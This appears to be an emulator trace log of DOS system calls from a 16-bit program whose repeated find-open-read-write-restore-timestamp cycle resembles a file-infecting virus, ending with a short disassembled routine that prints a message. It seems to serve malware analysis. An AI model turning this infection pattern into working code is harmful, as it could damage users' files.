2018-12-25T11:55:30.338853283Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.342054243Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.343787311Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.352157506Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.354041762Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.363052962Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.368404755Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.372042045Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.383365334Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.391925168Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.400600757Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.402554328Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.405431291Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.408290727Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.41176429Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.421162654Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.425536697Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.427726931Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.435530933Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.438297871Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.447308406Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.452924003Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.457686807Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.466086764Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.476006599Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.485404041Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.488105211Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.491209023Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.493858424Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.503799722Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.512931374Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.51583357Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.517762696Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.525750487Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.527697869Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.537208976Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.542783748Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.54617723Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.558464123Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.5659166Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.573417373Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.575790256Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.57845835Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.581064044Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.58539283Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.594197858Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.597407863Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.600052123Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.607833798Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.609511408Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.615806649Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.619981379Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.622430145Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.630289122Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.63624625Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.641487954Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.642919888Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.65167327Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.65553968Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.657675291Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:30.661885303Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:30.664516996Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:30.673076603Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:30.675681786Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
0x12b0a: ja 0x12b2e
0x12b0c: mov ax, 0xd
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]
0x12b15: cld
0x12b16: lodsb al, byte ptr [si]
0x12b17: or al, al
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe
0x12b1d: xor bh, bh
0x12b1f: mov bl, 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15
0x12b25: xor ax, ax
0x12b27: int 0x16
0x12b29: mov ax, 3
0x12b2c: int 0x10
0x12b2e: push ax
0x12b2f: push bp
2018-12-25T11:55:30.677928803Z 26 PC: 12b3e | Set disk transfer address